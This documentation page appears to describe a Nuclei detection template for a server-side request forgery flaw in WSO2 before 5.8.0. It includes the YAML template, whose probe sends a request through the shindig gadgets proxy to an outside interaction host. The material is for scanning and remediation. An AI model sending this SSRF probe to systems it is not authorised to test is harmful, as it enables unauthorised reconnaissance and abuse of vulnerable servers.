WSO2 <5.8.0 - Server Side Request Forgery
ID: WSO2-2019-0598
Severity: medium
Author: Amnotacat
Tags: ssrf,wso2,shindig
Description
Section titled “Description”WSO2 prior to version 5.8.0 is susceptible to a server-side request forgery vulnerability. This vulnerability can be exploited by misusing the UI gadgets loading capability of the shindig web application. An attacker can alter a specific URL in the request causing the server to initiate a GET request to the altered URL.
YAML Source
Section titled “YAML Source”id: WSO2-2019-0598
info: name: WSO2 <5.8.0 - Server Side Request Forgery author: Amnotacat severity: medium description: | WSO2 prior to version 5.8.0 is susceptible to a server-side request forgery vulnerability. This vulnerability can be exploited by misusing the UI gadgets loading capability of the shindig web application. An attacker can alter a specific URL in the request causing the server to initiate a GET request to the altered URL. remediation: | Upgrade the product version to 5.8.0 or higher. reference: - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2019-0598 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 6.8 cwe-id: CWE-918 metadata: max-request: 1 tags: ssrf,wso2,shindig
http: - method: GET path: - "{{BaseURL}}/shindig/gadgets/proxy?container=default&url=http://oast.pro"
matchers-condition: and matchers: - type: word words: - "Interactsh Server"
- type: status status: - 200# digest: 490a0046304402205d59f4786791ddb68b2a738a2e2369b9df58cc1cb253eb34f0ad7d577623ffc50220741e4aad6ffd689bbb3a3467d75144969656815ff035e5bac6624c8df66b0529:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/WSO2-2019-0598.yaml"